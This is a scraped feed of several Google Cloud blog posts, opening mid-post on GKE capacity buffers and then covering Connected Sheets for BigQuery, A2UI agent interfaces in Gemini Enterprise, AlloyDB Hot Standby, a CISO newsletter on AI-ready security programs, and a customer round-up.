code_block: <ListValue: [StructValue([('code', 'apiVersion: autoscaling.x-k8s.io/v1beta1\r\nkind: CapacityBuffer\r\nmetadata:\r\n name: my-standby-buffer-resource-limits\r\n namespace: my-namespace\r\n annotations:\r\n # Optional: Time after which buffer nodes are suspended.\r\n # Default is 5 minutes. \r\n buffer.gke.io/standby-capacity-init-time: "5m"\r\n # Optional: Time after which standby buffers are recreated.\r\n # Default is 1 day, "never" avoids refreshing. \r\n buffer.gke.io/standby-capacity-refresh-frequency: "1d"\r\nspec:\r\n podTemplateRef:\r\n name: my-buffer-unit-template\r\n # The desired state is 20 standby buffer units.\r\n # When a standby buffer gets used, a new one gets created.\r\n limits:\r\n cpu: "50"\r\n memory: "50Gi"\r\n provisioningStrategy: "buffer.gke.io/standby-capacity"'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fa940211310>)])]>

And an active buffer of seven 5 CPUs and 5 GB of RAM (optional):

code_block: <ListValue: [StructValue([('code', 'apiVersion: autoscaling.x-k8s.io/v1beta1\r\nkind: CapacityBuffer\r\nmetadata:\r\n name: my-active-buffer-resource-limits\r\n namespace: my-namespace\r\nspec:\r\n podTemplateRef:\r\n name: my-buffer-unit-template\r\n # The desired state is 2 active buffer units.\r\n # When an active buffer gets used, a new one gets created. \r\n limits:\r\n cpu: "5"\r\n memory: "5Gi"\r\n provisioningStrategy: "buffer.x-k8s.io/active-capacity"'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fa9402111c0>)])]>

Finally, apply the above objects to your cluster. That’s it!

Now, any existing and future deployments that can schedule on the space reserved by the buffers will benefit from faster pod scheduling latencies.

Test the buffers

You can check on the status of your buffers. In Kubernetes, suspended nodes can be identified by condition Suspended.

code_block: <ListValue: [StructValue([('code', 'kubectl get nodes -o custom-columns=\'NAME:.metadata.name,SUSPENDED:.status.conditions[?(@.type=="Suspended")].status\''), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fa940211ca0>)])]>

Expect the following kind of output, and wait for the standby buffers to get suspended.

code_block: <ListValue: [StructValue([('code', 'NAME SUSPENDED\r\ngke-my-cluster-nap-n4-standard-8-k960-...-ffbx False # Node has been resumed.\r\ngke-my-cluster-nap-n4-standard-4-k960-...-h2x4 <none> # Node was never suspended.\r\ngke-my-cluster-nap-n4d-standard-8-1cip-...-74jf True # Node is suspended.'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fa940211970>)])]>

To test the buffers, create a deployment and scale it.

code_block: <ListValue: [StructValue([('code', 'apiVersion: apps/v1\r\nkind: Deployment\r\nmetadata:\r\n name: my-deployment\r\n namespace: my-namespace\r\nspec:\r\n replicas: 1\r\n selector:\r\n matchLabels:\r\n app: my-deployment\r\n template:\r\n metadata:\r\n labels:\r\n app: my-deployment\r\n spec:\r\n containers:\r\n - name: busybox\r\n image: busybox\r\n command: ["sleep", "inf"]\r\n resources:\r\n requests:\r\n cpu: "500m"\r\n memory: "500Mi"\r\n # Optional: Using buffers with a custom ComputeClass /\r\n # controls the properties of the nodes GKE provisions. \r\n nodeSelector:\r\n cloud.google.com/compute-class: my-ccc'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fa940211340>)])]>

Scaling this deployment to two replicas allows them to be assigned to the active buffer for immediate scheduling. The active buffer is then immediately refilled from the standby buffer. Simultaneously, the standby buffer initiates the provisioning of new nodes.

If you further scale the deployment to 50 replicas, scheduling all of them on the standby buffer occurs once the nodes resume. New nodes provisioned to refill the standby buffer briefly function as active buffers providing a temporary active standby boost. Therefore, when further scaling the deployment to 100 replicas during this time, you may notice that new replicas benefit from immediate scheduling.

GKE standby buffer best practices

When working with GKE standby buffers, here are a few things to consider:

Define standby buffers that are sufficient to cover the extended load you expect to encounter, so that buffers can refill in the background from a cold start. A sufficiently sized standby buffer can drop your max pod scheduling latency to the time it takes to resume a node — around 30 seconds.
When the buffer starts to get used and is refilled, new buffer nodes initially swing into an active state prior to suspending. This helps to boost active capacity during a prolonged load.
If your application requires the lowest possible pod scheduling latency, define an active buffer size that is sufficient to cover any initial spikes you expect to encounter until standby buffer nodes are able to resume. The system prioritizes refilling the active buffer by consuming the standby buffer. A sufficiently sized active buffer and a sufficiently sized standby buffer can help you achieve one-second pod scheduling latency for a fraction of the cost of overprovisioning.
Experiment with different buffer sizes to get the best result for your workload.

To help, we created a simulator to help with sizing the buffers to achieve your performance targets, available at https://github.com/gke-labs/buffers-simulator.

Try it yourself!

Active and standby buffers in GKE provide a native solution for low-latency and cost-effective workload scaling by maintaining warm and standby capacity buffers. By circumventing slow node cold starts, buffers help performance-critical applications handle sudden traffic spikes. This feature replaces complex manual workarounds like balloon pods with a simple, declarative API, and allows for fixed, percentage-based, or resource-limited buffering strategies to help maintain strict service-level objectives cost-effectively and without over-provisioning for peak.

Standby buffers are available for GKE clusters running version 1.36.0-gke.2253000 or later. To get started with buffers, check out the documentation.

From petabytes to predictions: Easy BigQuery insights in Google Sheets

Fri, 29 May 2026 16:00:00 +0000

Many organizations’ single source of truth is data that resides in BigQuery, Google’s governed, secure and petabyte-scale data platform. However, the "last mile" of ad-hoc analysis, modeling, and reporting often happens where business users are most comfortable: Google Sheets.

Bridging this gap usually involves exporting data as CSVs. But this is inefficient, creating data silos, version control problems, and security and governance risks. Connected Sheets helps to eliminate this trade-off, turning the familiar Google Sheets interface into a direct, live window into your BigQuery data platform, letting you analyze petabytes of data quickly, securely, and easily.

In this post, we’ll do a quick overview of Connected Sheets, walk through real-world use cases, and show you how to perform enterprise-grade data analysis using BigQuery directly in Google Sheets.

A live window into the single source of truth

Business users often wait days or weeks for simple reports. Connected Sheets solves this by letting you analyze your critical data via a secure, direct connection to billions of rows of live data, with no SQL required.

For data admins, this architecture is appealing because it maintains a strong security and governance posture. They can provision access to specific tables or views, confident that the underlying data cannot be altered from a Connected Sheet. Admins can also take advantage of Google Workspace’s enterprise data protections to control reading, sharing, and copying data throughout its lifecycle.

For end users, the benefit is immediate agility and ease of use. They can use familiar tools like pivot tables, charts, calculated columns, and formulas to analyze billions of rows of live data as if it were a local file, balancing centralized control with the business's demand for speed. End users don’t have to learn technical concepts like databases, schemas, tables, and query languages like SQL to access, analyze, and visualize the data.

Key use cases and core journeys

We consistently hear about three primary use cases for Connected Sheets from customers across industries.

1. Self-service exploratory analysis: Data teams provide access to curated tables and datasets in BigQuery. Business Analysts in sales, operations, finance, or marketing can then build their own pivot tables or charts that run over the entire live data source directly from Sheets, then filter data to answer day-to-day questions, freeing the data team from a constant backlog of ad-hoc requests.

Example: Deep-dive investigation

Scenario: A sales manager analyzes millions of global transactions to review quarterly performance.
Action: Using a Connected Sheets pivot table, they quickly create a pivot table to summarize revenue by region and product line. When they spot an anomaly — an unexpected revenue spike in EMEA, for example — they simply double-click the summarized value to drill down and learn more about exactly what led to that value.
Outcome: Connected Sheets instantly queries and retrieves the precise, granular transaction rows behind that summary value, making it easy and fast to find the root cause.

2. Operational reporting: Business users can create live, refreshable, and easy-to-understand dashboard-like views of their data that their partner teams can rely on and share with executives and leads.

Example: Automated executive summary

Scenario: An operations lead provides weekly updates on sales invoices to their leadership, based on a BigQuery dataset with millions of rows.
Action: The operations lead creates their Connected Sheet and builds a series of charts to visualize invoice trends over time. They then configure the sheet to automatically refresh on a schedule every Monday morning, so it’s always ready ahead of their executive review.
Outcome: The manual routine of exporting data and pasting it into workbooks is completely eliminated. Leadership gets a reliable report and analysis powered by the latest warehouse data.

3. Hybrid data modeling: Data practitioners often need to blend governed warehouse data with real-time manual inputs and annotations. For example, a finance team might pull revenue data from BigQuery and combine it with manual procurement entries from your ERP system in a separate tab, using VLOOKUP to create a consolidated view for month-end reporting.

Example: Custom business metrics

Scenario: A financial analyst calculates custom commission payouts based on live sales data from your CRM system. The commission tier logic changes frequently and isn't modeled in the central data warehouse.
Action: Instead of requesting a new data pipeline from their data team, the analyst can add a calculated column directly within the Connected Sheet. They use standard spreadsheet formulas (like IF or IFS) to apply custom business logic directly against the BigQuery data.
Outcome: The analyst retains the flexibility to model scenarios and calculate metrics quickly, while maintaining governed BigQuery data as their single source of truth.

Getting started

Connecting Google Sheets to BigQuery is straightforward and requires only a Google Workspace account and a billing-enabled Google Cloud project. There are two primary ways to establish a connection and create a Connected Sheet.

Path 1: Starting from Sheets
This is the typical workflow for users who work primarily within spreadsheets.

Open a new Google Sheet.
Navigate to Data > Data Connectors > Connect to BigQuery.
Select your billing-enabled Google Cloud project.
Browse available datasets, select a Saved Query to connect right away, or input a custom SQL query.
Click Connect.

Path 2: Starting from BigQuery
This workflow is common for data analysts starting from the Google Cloud console.

Navigate to the BigQuery UI in the console.
In the Explorer pane, locate the table or query result you wish to analyze.
Click the Export menu (or the three-dot action menu) next to the asset.
Select Open in > Connected Sheets.

From petabytes to predictions with Connected Sheets

We designed Connected Sheets to help you bridge the gap between the scalability of the cloud and the flexibility of the spreadsheet. With Connected Sheets, we’re making it easier than ever for organizations to put data into the hands of the people who need it.

To explore these features, connect your BigQuery data to Google Sheets today. For more technical details, visit the Connected Sheets documentation.

Developer's guide to Gemini Enterprise and A2UI integration

Fri, 29 May 2026 16:00:00 +0000

If you've built a chatbot, you know this conversation:

User: "Book a table for two tomorrow at 7pm." Agent: "Okay, for what day?" User: "Tomorrow." Agent: "What time?"

A date picker would have ended this in one tap. But until recently, agents had no standard way to render a date picker — or a map, or a multi-select list — inside the chat surface they live in. They could only return text or markdown for generic usage.

Today, we're walking through how to fix that with A2UI, an open protocol for agent-driven user interfaces, and how to integrate an A2UI-enabled agent with Gemini Enterprise (GE) so your agent renders rich and interactive UI natively in the GE chat surface — and in your own custom frontend if you want one. We'll use a working restaurant-finder agent — built with the Google Agent Development Kit (ADK), the A2A protocol, and Gemini — as the reference. The full source is on GitHub and there's a 2-minute demo video.

The problem: agents speak text, but users want UI

Most agent frameworks today return strings. That's fine for short answers, but it breaks down quickly:

Multi-turn slot filling (date, time, party size) burns turns and patience.
Choices among options (which restaurant? which insurance plan?) become long bulleted lists the user has to copy-paste back.
Spatial information (locations, routes, floor plans) is reduced to addresses.

Developers have tried to patch this by sending HTML or JavaScript fragments, but that introduces real risks: cross-site scripting, UI injection from a remote agent you don't fully control, and visual drift from the host app's design system. What's needed is a way to transmit UI that's safe like data and expressive like code.

What A2UI is

A2UI is an open protocol, introduced by Google and co-developed with the Flutter team and product teams behind Gemini Enterprise. Instead of returning text or HTML, an agent returns a JSON payload that describes a UI: a tree of components (Card, Text, Button, ChoicePicker, Image, …) and a separate data model holding the values those components display.

Three properties make this useful in practice:

Declarative, not executable. The payload is data. The client only renders components from a pre-approved catalog, so a remote agent can't inject arbitrary code or steal credentials through a UI widget.
Streaming-friendly. The format is a flat list of small JSON messages, so the LLM can emit them incrementally and the client can paint as they arrive.
Framework-agnostic. The same agent response renders through Lit, Angular, Flutter, or native mobile. The agent doesn't know — or care — what's on the other end.

A2UI is also transport-agnostic. The messages ride inside whatever pipe you already use: A2A JSON-RPC, AG-UI, WebSockets, SSE. In our reference implementation, A2UI rides inside the A2A protocol as DataPart objects with the MIME type application/json+a2ui.

Where A2UI sits in the stack

A2UI is one piece of a four-layer stack. Confusion usually comes from conflating these layers — they're each doing a different job:

Layer	Owns	Examples
App experience	Client shell and conversation state — chat window, input box, message history	CopilotKit, AG-UI
Pixel drawing	Turning component descriptions into actual rendered UI	Lit, Flutter, Angular
Conversation pipeline	Client–server transport — sending messages, receiving responses	A2A Protocol
Cargo (data format)	The thing flowing through the pipeline that describes the UI	A2UI

Read top to bottom: CopilotKit/AG-UI owns the app experience. Lit/Flutter/Angular own the rendering. While CopilotKit and AG-UI provide valuable abstractions, they remain strictly optional for implementing A2UI. In this architecture, A2A serves as the underlying conversation pipeline, while A2UI represents the structured cargo that actually traverses that pipe.

That separation is why the same A2UI payload renders identically in three very different deployment shapes:

Bespoke web app — a custom client shell (like the reference repo's Lit frontend/) plus a custom A2UI renderer.
CopilotKit / AG-UI app — CopilotKit owns the chat shell, an A2UI renderer is registered inside it for rich cards.
Gemini Enterprise — GE is the shell, the renderer, and the transport client. You only build the agent.

So for the GE path, the stack collapses to two layers you control: the A2A endpoint (your agent) and the A2UI cargo it emits. The other two layers are GE's responsibility. CopilotKit and AG-UI are great if you're building a standalone product UI elsewhere — they're just out of scope for embedding an agent inside Gemini Enterprise.

Pattern revisions

The protocol evolves quickly, and different clients support different revisions. Two patterns are common today:

Inline pattern — the agent sends a component tree with the data baked into each component (the pattern Gemini Enterprise renders today).
Decoupled pattern — the agent sends the component tree and the data model as separate messages, so subsequent turns can update one without re-sending the other. This reduces tokens and latency for long-running conversations and is the direction the protocol is heading.

The reference repo serves both patterns from one backend, picking which to emit per request based on the client's X-A2A-Extensions header. As new revisions ship, you add another catalog and the same negotiation pattern keeps working.

How A2UI works inside Gemini Enterprise

Gemini Enterprise ships with a built-in A2UI renderer. For the developer, that means the integration story is short:

Build your A2A agent, embedding an A2UI catalog and example payloads alongside the regular tool definitions.
Register the agent with Gemini Enterprise as an A2A endpoint. (Use make register-gemini-enterprise in the reference repo.)
A GE admin shares the agent with employees, just like any other agent in the GE catalog.

At runtime, the flow looks like this:

The user types a request in the GE chat. GE calls your agent's A2A endpoint and sends along GE's own A2UI catalog — the list of UI components GE knows how to render.
Your agent decides whether a UI widget is the right response. If yes, it emits an A2UI JSON message (e.g., a ChoicePicker of restaurant options). If no, it falls back to text. Both can coexist in the same response.
GE receives the JSON, validates it against its catalog, and renders the widget natively in GE's own design language — so it visually matches the rest of the chat surface.
When the user interacts with the widget (selects three options, picks a date), GE serializes the interaction back into JSON and sends it to your agent as the next turn. Your agent processes structured input, not free-form text.

One thing worth flagging: because your agent doesn't ship its own renderer for GE, you don't need to choose a frontend framework to start. Your A2A endpoint can run anywhere — Cloud Run, GKE, on-prem — and GE handles the rendering.

High-level architecture example

The reference implementation is an ADK backend on Cloud Run designed to plug seamlessly into Gemini Enterprise.

Gemini Enterprise connects directly to your agent using standard A2A JSON-RPC calls.
The agent serves the inline message pattern expected by the Gemini Enterprise managed UI.
Custom components like GoogleMap render via Google Maps Embed iframes, with the API key injected server-side so the LLM never sees it.

The following demonstration illustrates how Google Maps functions as a live, interactive component within Gemini Enterprise rather than a static image. Leveraging A2UI's streaming-friendly architecture, the agent updates the map view in real-time—dropping pins and adjusting coordinates incrementally as results arrive from the Maps API.

See it running, then build your own

Detailed implementation guide here.
Demo video (2 minutes, end-to-end with both the Lit shell and Gemini Enterprise): https://youtu.be/_5AaYwyqVio
A2UI spec and component reference: a2ui.org
Gemini Enterprise updates, including the A2UI renderer: What's new in Gemini Enterprise
A2UI generative UI announcement: Introducing A2UI generative UI

If you're already building agents on Google Cloud, the fastest path is to clone the reference repo, run make local-backend for a local smoke test, and then make register-gemini-enterprise to wire it into GE. From there, swap in your own catalog, your own tools, and your own domain. The next time a user asks your agent for "a table for two tomorrow at 7pm," the answer can be a date picker instead of another question.

AlloyDB Hot Standby: Faster failovers, consistent performance

Fri, 29 May 2026 16:00:00 +0000

AlloyDB for PostgreSQL is a fully managed, PostgreSQL-compatible database service designed for the most demanding enterprise workloads. It combines the best of PostgreSQL with the power of Google, delivering exceptional performance, scalability, and availability. We are continuously innovating to make AlloyDB even more resilient, and today, we're excited to announce a significant upgrade to our High Availability (HA) architecture: Hot Standby.

Understanding AlloyDB HA Architecture

An AlloyDB primary instance configured for high availability consists of an active node and a standby node, located in different zones within a region for resilience. AlloyDB's cloud-native architecture separates compute and storage to allow for individual scaling of each resource. Database write-ahead logs (WAL) are synchronously written to a regional log persistor, ensuring durability, while data blocks reside in AlloyDB's regional storage service. A load balancer directs traffic to the current active node using a stable IP address.

In the traditional HA model, if the active node became unavailable, AlloyDB would automatically initiate a failover. The standby node, previously idle from a PostgreSQL perspective, would start the database, process any remaining logs, and then take over. While this ensures high availability, the database startup time and the subsequent cache warming period could impact application recovery time and performance.

Introducing AlloyDB Hot Standby: The New Architecture

With the new Hot Standby capability, we've transformed the role of the standby node. Instead of being a passive node, the standby node now continuously applies WAL records streamed from the primary. This architectural shift brings two massive advantages:

Dramatically Reduced Failover Times: Because PostgreSQL is already running, initialized, and actively replicating on the standby, the time required to promote it to primary in the event of a failure is significantly shorter. The system detects the failure (typically within 30 seconds), promotes the standby, and redirects connections. The database startup phase on the standby is eliminated, reducing overall downtime and improving your Recovery Time Objective (RTO).
Consistent Performance After Failover: Since the Hot Standby node is actively replaying logs, its memory caches (like the PostgreSQL buffer cache) are kept "warm." They contain much of the same frequently accessed data as the primary node's caches. When a failover occurs, the new primary can serve requests at optimal speed almost immediately. This avoids the performance "brownout" typically seen while caches warm up from disk, ensuring application performance remains stable.

And the best part? This substantial enhancement to availability and resilience comes at no additional cost to you.

See Hot Standby in Action

We've prepared a short demonstration to illustrate the difference between the new Hot Standby HA and the legacy HA setup. In the video, we run a benchmark load on two AlloyDB instances and trigger a failover on both simultaneously.

As you can see in the demo:

The instance with Hot Standby completes the failover in approximately 15 seconds. Crucially, its transaction per second (TPS) rate returns to the pre-failover levels almost immediately.
The instance with Legacy HA takes noticeably longer to complete the failover. Even when it comes back online, the TPS is significantly lower and takes several minutes to ramp back up to the original performance levels as its caches warm up.

This side-by-side comparison clearly shows the benefits of Hot Standby in minimizing downtime and eliminating the post-failover performance impact.

Get Started with Enhanced HA

Hot Standby is being rolled out to newly created AlloyDB instances in PostgreSQL 18, providing an upgraded HA experience automatically, and will be rolling out to the earlier major versions in the coming months. You can continue to rely on AlloyDB's 99.99% SLA, now backed by even faster failovers and more predictable post-failover performance.

This enhancement underscores our commitment to providing a best-in-class, enterprise-grade managed PostgreSQL experience.

To learn more about AlloyDB's High Availability features, please refer to the official documentation. New to AlloyDB? Try it out today!

Cloud CISO Perspectives: How to build an AI-ready security program for the public sector

Fri, 29 May 2026 16:00:00 +0000

Welcome to the second Cloud CISO Perspectives for May 2026. Today, Usman Chaudhary, Field CISO, Google Public Sector, offers a guide for CISOs protecting government agencies and critical infrastructure on how to get started — and get the most out of — defending with AI.

As with all Cloud CISO Perspectives, the contents of this newsletter are posted to the Google Cloud blog. If you’re reading this on the website and you’d like to receive the email version, you can subscribe here.

aside_block: <ListValue: [StructValue([('title', 'Get vital board insights with Google Cloud'), ('body', <wagtail.rich_text.RichText object at 0x7fa923f13b50>), ('btn_text', 'Visit the hub'), ('href', 'https://cloud.google.com/solutions/security/board-of-directors?utm_source=cgc-site&utm_medium=et&utm_campaign=FY26-Q2-GLOBAL-GCP39634-email-dl-dgcsm-CISOP-NL-177159&utm_content=-&utm_term=-'), ('image', <GAEImage: GCAT-replacement-logo-A>)])]>

How to build an AI-ready security program for the public sector

By Usman Chaudhary, Field CISO, Google Public Sector

Usman Chaudhary, Field CISO, Google Public Sector

Deciphering actionable signals from deafening noise can be hard for CISOs, even with AI — and especially for those guiding government agencies, critical manufacturing plants, or in a foundational industry.

From industrial control systems to decades-old municipal databases, you’re securing complex, deeply entrenched systems, and the sudden mandate to adopt AI can feel less like an evolution and more like a breaking point.

While it’s true that you face a monumental challenge, we know that from our conversations with CISOs and customers that we can offer concrete, actionable steps on how to build an adaptable, AI-augmented defense while managing the operational load on your staff.

The urgency created by machine-speed exploits means you can not rely solely on reactive measures. Once the immediate administrative toil has been reduced, you should aggressively shift your focus toward posture elevation, proactive hunting, and structural integration in the next six to 12 months.

Importantly, executing this vision does not mean developing everything from scratch. This roadmap relies on a strategic combination of building custom internal workflows (like Gemini Gems), buying established commercial AI capabilities, and integrating them into your existing security stack.

Google's Gemini for Government delivers agentic AI for more than three million federal civilian and military personnel on a platform accredited at FedRAMP High and DOW Impact Level 5.

To help you prioritize resources, we have structured the necessary AI initiatives across five core CISO workload domains, highlighting your team's immediate quick wins in the first 90 days alongside tactical goals in the first six months, and strategic goals in the six-to-12-month horizon.

Your tactical execution plan: Months zero to six

Building an AI-ready security program is a journey. We’re focusing strictly on high-value use cases you can deploy immediately and in the next six months.

1. Executive alignment and business justification: The goal is to stop defending your budget with technical jargon and start explaining resilience in terms of financial risk and operational efficiency.

AI-driven board reporting (Immediate): Translate complex technical data into clear business impact. Pipe your metrics into a secure enterprise workspace (like Gemini for Workspace). Prompt the model to synthesize the raw data into a concise, two-page risk narrative that includes highlights such as containment metrics, potential impact on citizen services, and production uptime for critical assembly lines.
Vendor and spend optimization (Immediate): Upload vendor capability matrices and contracts to an isolated AI agent (like NotebookLM). Have it identify feature redundancies across your stack, suggesting clear paths for tool consolidation and budget optimization. Be sure to ground these insights with third-party validation from reputable sources like Gartner or Forrester.

2. Process optimization and toil reduction: The goal is to treat AI as a muse, not an oracle. Do not trust it to make final administrative decisions, but do use it to drastically reduce cognitive fatigue.

Automated context gathering and SOC triage (Immediate): Level 1 analysts spend a lot of time manually gathering context across logs, correlating IP reputations, and triaging ambiguous alerts. Integrate a specialized large-language model (LLM) workflow or use built-in capabilities in your SIEM and SOAR (like Google Security Operations) to consolidate this data automatically and provide instant, clear triage verdicts to investigate further or ignore.
Threat intelligence analysis (within six months): Automate a daily pipeline where an LLM ingests industry advisories and distills the noise into prioritized summaries relevant to your sector. Translating that raw text into functional detection rules is a complex engineering challenge. Instead of building this pipeline internally, use security platforms that natively automate indicators of compromise (IOC) extraction and rule engineering.
SOP mapping and agent creation (within six months): Churn and burnout are significant operational risks. Ingest your historical incident resolution notes and standard operating protocols (SOP) into an AI to build a knowledge-base agent. Identify the top five most frequent manual processes, and task an analyst with using a coding agent to document and automate them.

3. Talent upleveling and augmentation: The goal is to empower your practitioners to become AI builders rather than viewing technology as a threat to their expertise.

Natural language to query generation (within six months): Bridge the skills gap inside your SOC. Provide analysts with a secure conversational AI assistant or chatbot to translate plain English hypotheses into executing SIEM queries.
AI-driven security training (within six months): As manual processes are increasingly automated, use that reclaimed time to run capture the flag (CTF) exercises and community contests for your security team. Use an LLM to generate unique, one-shot red team test cases and training scripts that map specifically to your environment's architecture, helping train analysts through hyper-realistic, hands-on learning in simulated environments.

Your strategic horizon: Months six to 12

4. Posture elevation and threat hunting: The goal is to transition your team from a purely reactive posture into a state of continuous defense.

Contextual vulnerability prioritization: Deploy an AI agent to correlate scanner output with your internal architecture context and active threat intelligence, scoring vulnerabilities against actual environment exposure.
AI-assisted architectural threat modeling: Paste proposed system architecture diagrams into an AI assistant during the design phase — before your developers write a single line of application code — to generate a prioritized risk backlog, highlighting business logic flaws and data egress risks early.
Proactive threat hunting: Use AI as a hunting advisor. Have it generate hypotheses aligned with MITRE ATT&CK, suggest the necessary log sources to prove or disprove the hypothesis, and help pivot investigations when a human analyst hits a dead end. Eventually, you want to move to a fully-automated hunting agent which initiates a hunt upon detecting a new IOC and proactively selects the appropriate data, searches through it, and provides findings.
Continuous red team agents: Deploy autonomous or semi-autonomous red team agents to continuously probe your defenses. The active findings and attack paths generated by these agents create a continuous feedback loop — feeding directly into your threat intelligence analysis, SOC playbooks, and contextual vulnerability prioritization.

5. Advanced governance and incident response: The goal is to build structural guardrails for an environment where AI generates code, while preparing for high-stress incidents.

Policy and compliance gap analysis: Rapidly check if new operational proposals or cloud architectures conflict with internal policies or strict regulatory frameworks (like FedRAMP and NIST guidelines). Use an isolated agent preloaded with your governance documentation to review new project proposals and highlight violations.
Interactive incident response (IR) playbooks: Standard tabletops and static PDF playbooks often fail during a real breach. Train an internal agent on your organization’s historical IR tickets and SOPs. During a live crisis, this agent can act as an interactive guide, providing step-by-step containment instructions that actively adapt to the specific details and telemetry of the ongoing incident.
Secure code review at the pull request: The proliferation of AI coding assistants means your developers are generating code — and potential vulnerabilities — faster than ever. Manual security reviews can no longer keep up. You must turn AI inward on your own pipelines. Integrate advanced LLM-powered auditors directly into your CI/CD pipeline as a mandatory security gate to catch AI-generated vulnerabilities and automatically block insecure commits before they merge into production.
Autonomous defense for collapsed exploit windows: The rapid advancement of AI capabilities has effectively collapsed the time-to-exploit window, and to be faster than the adversary you should use AI to actively find and patch vulnerabilities. This approach requires a continuous, multi-step workflow to map and prioritize your codebase, deploy AI to deeply scan the highest-risk code, autonomously verify and implement patches, and continuously monitor the runtime environment.

Because these sophisticated workflows are incredibly difficult to build and maintain internally, it is highly practical to use leading solutions — such as Google AI Threat Defense — to help you predict attack paths and deploy fixes at machine speed.

Moving forward with confidence

The transition to an AI-augmented security program can feel intimidating, but the technological barrier to entry is lower than it has ever been. By shifting your focus from reactive alert management to internal context, structured automation, and rapid governance, you can effectively outpace modern threats while also alleviating the operational burden on your workforce.

Start small. Pick one quick win from the roadmap this week — such as automating your alert triage or mapping your top five SOPs — and begin building the muscle memory your team needs to stay resilient for the era ahead.

To learn more, check out our Security Talks online event on June 10.

aside_block: <ListValue: [StructValue([('title', 'Fact of the month'), ('body', <wagtail.rich_text.RichText object at 0x7fa923f135e0>), ('btn_text', 'Learn more'), ('href', 'https://cloud.google.com/blog/topics/threat-intelligence/m-trends-2026'), ('image', <GAEImage: Cloud-CISO-Perspectives-logo-A>)])]>

In case you missed it

Here are the latest updates, products, services, and resources from our security teams so far this month:

Introducing Google AI Threat Defense to help you outpace the adversary: AI Threat Defense is a comprehensive AI-powered cybersecurity solution, an always-on security platform to outpace AI-driven attacks. Read more.
State of SDLC Security 2026: How risk scales in modern development: Wiz researchers share their latest insights from real-world environments into how code, developer tooling, automation, and AI are reshaping application security. Read more.
Claude Enterprise meets the Wiz Security Graph: Security and compliance teams can now monitor Claude activity directly in Wiz, extending to AI the workflows they already rely on. Read more.
How Fraud Defense uses AI to protect the internet: Google Cloud Fraud Defense (formerly reCAPTCHA) now supports agents as first-class users in the browser, has extensively revamped our detection stack with advanced predictive machine learning to model user and bot behavior, and can adapt continuously to new bots and threat vectors. Read more.
What’s new in Android security and privacy in 2026: Android elevates mobile security with new AI-powered protections and advanced safeguards to help keep you safe. Read more.
Defending at machine-speed: Building AI threat readiness with Wiz: Learn how Wiz can help organizations adopt an AI-driven operating model for AI threat readiness. Read more.
Introducing Runtime Threat Detection for Google Cloud Run: Wiz Runtime Sensor support for Google Cloud Run Containers is now generally available, giving teams real-time threat detection and response for their serverless container workloads. Read more.

Please visit the Google Cloud blog for more security stories published this month.

aside_block: <ListValue: [StructValue([('title', 'Join the Google Cloud CISO Community'), ('body', <wagtail.rich_text.RichText object at 0x7fa923f13ca0>), ('btn_text', 'Learn more'), ('href', 'https://rsvp.withgoogle.com/events/google-cloud-ciso-community-interest-form-2026?utm_source=cgc-blog&utm_medium=blog&utm_campaign=FY25-Q1-global-GCP30328-physicalevent-er-dgcsm-parent-CISO-community-2025&utm_content=cisop_&utm_term=-'), ('image', <GAEImage: GCAT-replacement-logo-A>)])]>

Threat Intelligence news

Welcome to BlackFile: Inside a vishing extortion operation: Google Threat Intelligence Group (GTIG) has continued to track an expansive extortion campaign by UNC6671, a threat actor operating under the "BlackFile" brand, that targets organizations via sophisticated voice phishing (vishing) and single sign-on (SSO) compromise. Read more.
2 PhaaS 2 Furious: The evolution of Chinese-language phishing services: While Russian-speaking threat actors have historically dominated the phishing-as-a-service (PhaaS) landscape, a rival ecosystem is rapidly growing within the Chinese-language underground. Within this ecosystem, GTIG has observed a fundamental move away from static password harvesting towards real-time interception and tokenization. Read more.
Exploitation of KnowledgeDeliver via ViewState deserialization vulnerability: In late 2025, Mandiant responded to a security incident involving a compromised web server running KnowledgeDeliver, a learning management system (LMS) developed by Digital Knowledge commonly used in Japan. Mandiant identified a critical vulnerability that allowed unauthenticated remote code execution (RCE), stemming from the use of identical pre-shared ASP.NET machine keys across customer deployments. Read more.

Please visit the Google Cloud blog for more threat intelligence stories published this month.

Now hear this: Podcasts from Google Cloud

Cloud Security Podcast: Is ‘good enough’ the same as winning: Gal Ordo, co-founder and chief product officer, Native, debates native controls and what happens when a customer needs a feature that a cloud provider hasn't built yet. Listen here.
Cloud Security Podcast: What agentic SOCs should measure: So far this year, what are we measuring for success in agentic SOCs? Matt Gregson, principal, PwC Cyber Security, talks about the state of the agentic SOC. Listen here.
Cloud Security Podcast: CISO as CFO: From Citi to celery, it's all about the cabbage: Most people do not associate grocery wholesale and retail with cutting edge technology and threat models. Arvin Bansal, CISO, C&S Wholesale Grocers, explains why there’s more here than just dry goods. Listen here.
Cyber-Savvy Boardroom: From CISO checklists to CEO strategy: Dom Cussatt discusses the importance of mapping security and risk directly to business objectives. Listen here.

To have our Cloud CISO Perspectives post delivered twice a month to your inbox, sign up for our newsletter. We’ll be back in a few weeks with more security-related updates from Google Cloud.

Cool stuff Google Cloud customers built, May edition: Agentic algorithms for supply chains; virtual try-on APIs; robotic camera operators & more

Fri, 29 May 2026 16:00:00 +0000

AI and cloud technology are reshaping every corner of every industry around the world. Without our customers, who are building the future on our platform, there would be no Google

Cloud. In this regular round-up, we dive into some of the exciting projects redefining businesses, shaping industries, and creating new categories.

For our latest edition, we learn how Urban Outfitters sped up its order management; BASF uses AlphaEvolve algorithms to map global supply chains; the unification strategy for UKG’s workforce intelligence; WPP’s secrets to training humanoid robot camera operators; how Breuninger piloted Virtual Try-On APIs; creating automated video clips with Glance; and Movix improves the production of dental aligners.

Be sure to check back next month to see how more industry leaders and exciting startups are putting Google Cloud technologies to use. And if you haven’t already, please peruse our list of 1,302 real-world gen AI use cases from our customers.

Urban Outfitters saves big by migrating order management

Who: Urban Outfitters, Inc. (URBN), the popular clothing and home goods retailer, relies on IBM Sterling OMS as the nerve center of its global ecommerce operations. However, the foundation of this critical system — a massive 11TB Oracle database — was increasingly becoming a bottleneck.

What they did: URBN completed a major infrastructure upgrade, migrating its IBM Sterling OMS from an Oracle database to Google Cloud's AlloyDB for PostgreSQL. To enhance performance and provide high availability and scalability, the AlloyDB deployment architecture includes two read replicas, providing low-latency access to data for reporting and analytics. Google Cloud and IBM teams also assisted URBN in a rigorous, iterative switchover testing strategy.

